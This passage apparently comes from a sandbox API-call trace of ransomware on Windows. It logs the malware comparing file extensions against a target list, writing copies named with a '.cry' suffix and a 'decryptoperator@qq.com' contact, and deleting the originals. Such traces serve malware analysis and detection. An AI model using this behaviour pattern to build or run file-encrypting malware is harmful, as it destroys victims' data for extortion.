lstrlenW (lpString=".jpg") returned 4 [0050.068] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.068] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.069] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0050.069] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0050.069] lstrlenW (lpString=".doc") returned 4 [0050.069] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.069] lstrlenW (lpString=".docx") returned 5 [0050.069] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.069] lstrlenW (lpString=".pdf") returned 4 [0050.069] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.069] lstrlenW (lpString=".xls") returned 4 [0050.069] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.069] lstrlenW (lpString=".xlsx") returned 5 [0050.069] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.069] lstrlenW (lpString=".ppt") returned 4 [0050.069] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.069] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0050.069] lstrlenW (lpString=".zip") returned 4 [0050.069] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.069] lstrlenW (lpString=".rar") returned 4 [0050.069] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.069] lstrlenW (lpString=".bz2") returned 4 [0050.069] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.069] lstrlenW (lpString=".7z") returned 3 [0050.069] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.069] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0050.069] lstrlenW (lpString=".dbf") returned 4 [0050.069] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.069] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0050.069] lstrlenW (lpString=".1cd") returned 4 [0050.069] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.069] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0050.069] lstrlenW (lpString=".jpg") returned 4 [0050.069] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.069] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.070] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0050.070] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0050.070] lstrlenW (lpString=".doc") returned 4 [0050.070] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.070] lstrlenW (lpString=".docx") returned 5 [0050.070] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0050.070] lstrlenW (lpString=".pdf") returned 4 [0050.070] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.070] lstrlenW (lpString=".xls") returned 4 [0050.070] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.070] lstrlenW (lpString=".xlsx") returned 5 [0050.070] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0050.070] lstrlenW (lpString=".ppt") returned 4 [0050.070] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.070] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0050.070] lstrlenW (lpString=".zip") returned 4 [0050.070] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.070] lstrlenW (lpString=".rar") returned 4 [0050.070] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.070] lstrlenW (lpString=".bz2") returned 4 [0050.070] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.070] lstrlenW (lpString=".7z") returned 3 [0050.070] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.070] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0050.070] lstrlenW (lpString=".dbf") returned 4 [0050.070] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.070] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0050.070] lstrlenW (lpString=".1cd") returned 4 [0050.070] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.070] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0050.070] lstrlenW (lpString=".jpg") returned 4 [0050.070] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.071] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.071] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0050.071] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0050.071] lstrlenW (lpString=".doc") returned 4 [0050.071] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.071] lstrlenW (lpString=".docx") returned 5 [0050.071] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0050.071] lstrlenW (lpString=".pdf") returned 4 [0050.071] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.071] lstrlenW (lpString=".xls") returned 4 [0050.071] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.071] lstrlenW (lpString=".xlsx") returned 5 [0050.071] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0050.071] lstrlenW (lpString=".ppt") returned 4 [0050.071] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.071] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0050.071] lstrlenW (lpString=".zip") returned 4 [0050.071] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.071] lstrlenW (lpString=".rar") returned 4 [0050.071] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.071] lstrlenW (lpString=".bz2") returned 4 [0050.071] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.071] lstrlenW (lpString=".7z") returned 3 [0050.071] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.071] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0050.071] lstrlenW (lpString=".dbf") returned 4 [0050.071] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.071] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0050.071] lstrlenW (lpString=".1cd") returned 4 [0050.071] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.071] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0050.071] lstrlenW (lpString=".jpg") returned 4 [0050.071] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.333] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0050.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0050.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0050.333] lstrlenW (lpString=".doc") returned 4 [0050.333] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0050.333] lstrlenW (lpString=".docx") returned 5 [0050.333] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0050.333] lstrlenW (lpString=".pdf") returned 4 [0050.333] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0050.333] lstrlenW (lpString=".xls") returned 4 [0050.333] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0050.333] lstrlenW (lpString=".xlsx") returned 5 [0050.333] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0050.333] lstrlenW (lpString=".ppt") returned 4 [0050.333] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0050.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0050.333] lstrlenW (lpString=".zip") returned 4 [0050.333] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0050.333] lstrlenW (lpString=".rar") returned 4 [0050.333] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0050.333] lstrlenW (lpString=".bz2") returned 4 [0050.333] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0050.333] lstrlenW (lpString=".7z") returned 3 [0050.333] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0050.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0050.333] lstrlenW (lpString=".dbf") returned 4 [0050.333] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0050.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0050.334] lstrlenW (lpString=".1cd") returned 4 [0050.334] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0050.334] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0050.334] lstrlenW (lpString=".jpg") returned 4 [0050.334] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0050.345] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.345] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.347] GetLastError () returned 0x0 [0050.347] ReadFile (in: hFile=0x208, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x712e, lpOverlapped=0x0) returned 1 [0050.365] WriteFile (in: hFile=0x210, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x7130, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x7130, lpOverlapped=0x0) returned 1 [0050.366] ReadFile (in: hFile=0x208, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.366] WriteFile (in: hFile=0x210, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0050.366] SetEndOfFile (hFile=0x210) returned 1 [0050.367] CloseHandle (hObject=0x210) returned 1 [0050.367] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.367] SetEndOfFile (hFile=0x208) returned 1 [0050.368] CloseHandle (hObject=0x208) returned 1 [0050.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.368] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl")) returned 1 [0050.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0050.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0050.368] lstrlenW (lpString=".doc") returned 4 [0050.368] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.368] lstrlenW (lpString=".docx") returned 5 [0050.368] lstrcmpiW (lpString1=".docx", lpString2="t.xsl") returned -1 [0050.368] lstrlenW (lpString=".pdf") returned 4 [0050.368] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.368] lstrlenW (lpString=".xls") returned 4 [0050.368] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.368] lstrlenW (lpString=".xlsx") returned 5 [0050.368] lstrcmpiW (lpString1=".xlsx", lpString2="t.xsl") returned -1 [0050.368] lstrlenW (lpString=".ppt") returned 4 [0050.368] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0050.369] lstrlenW (lpString=".zip") returned 4 [0050.369] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.369] lstrlenW (lpString=".rar") returned 4 [0050.369] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.369] lstrlenW (lpString=".bz2") returned 4 [0050.369] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.369] lstrlenW (lpString=".7z") returned 3 [0050.369] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0050.369] lstrlenW (lpString=".dbf") returned 4 [0050.369] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0050.369] lstrlenW (lpString=".1cd") returned 4 [0050.369] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 77 [0050.369] lstrlenW (lpString=".jpg") returned 4 [0050.369] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.370] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=34076) returned 1 [0050.370] CloseHandle (hObject=0x208) returned 1 [0050.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 0x20 [0050.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0050.370] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.370] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.371] GetLastError () returned 0x0 [0050.371] ReadFile (in: hFile=0x208, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x851c, lpOverlapped=0x0) returned 1 [0050.430] WriteFile (in: hFile=0x210, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x8520, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x8520, lpOverlapped=0x0) returned 1 [0050.431] ReadFile (in: hFile=0x208, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.431] WriteFile (in: hFile=0x210, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0050.431] SetEndOfFile (hFile=0x210) returned 1 [0050.653] CloseHandle (hObject=0x210) returned 1 [0050.654] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.654] SetEndOfFile (hFile=0x208) returned 1 [0050.654] CloseHandle (hObject=0x208) returned 1 [0050.654] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.655] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 1 [0050.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0050.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0050.655] lstrlenW (lpString=".doc") returned 4 [0050.655] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.655] lstrlenW (lpString=".docx") returned 5 [0050.655] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0050.655] lstrlenW (lpString=".pdf") returned 4 [0050.655] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.655] lstrlenW (lpString=".xls") returned 4 [0050.655] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.655] lstrlenW (lpString=".xlsx") returned 5 [0050.655] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0050.655] lstrlenW (lpString=".ppt") returned 4 [0050.655] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0050.655] lstrlenW (lpString=".zip") returned 4 [0050.655] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.655] lstrlenW (lpString=".rar") returned 4 [0050.655] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.655] lstrlenW (lpString=".bz2") returned 4 [0050.655] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.655] lstrlenW (lpString=".7z") returned 3 [0050.655] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0050.655] lstrlenW (lpString=".dbf") returned 4 [0050.655] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0050.656] lstrlenW (lpString=".1cd") returned 4 [0050.656] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 79 [0050.656] lstrlenW (lpString=".jpg") returned 4 [0050.656] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0050.691] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=29790) returned 1 [0050.691] CloseHandle (hObject=0x20c) returned 1 [0050.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 0x20 [0050.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.691] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.691] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0050.693] GetLastError () returned 0x0 [0050.693] ReadFile (in: hFile=0x20c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x745e, lpOverlapped=0x0) returned 1 [0050.802] WriteFile (in: hFile=0x228, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x7460, lpOverlapped=0x0) returned 1 [0050.803] ReadFile (in: hFile=0x20c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0050.803] WriteFile (in: hFile=0x228, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0050.803] SetEndOfFile (hFile=0x228) returned 1 [0050.804] CloseHandle (hObject=0x228) returned 1 [0050.804] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0050.804] SetEndOfFile (hFile=0x20c) returned 1 [0050.805] CloseHandle (hObject=0x20c) returned 1 [0050.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0050.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 1 [0050.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0050.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS 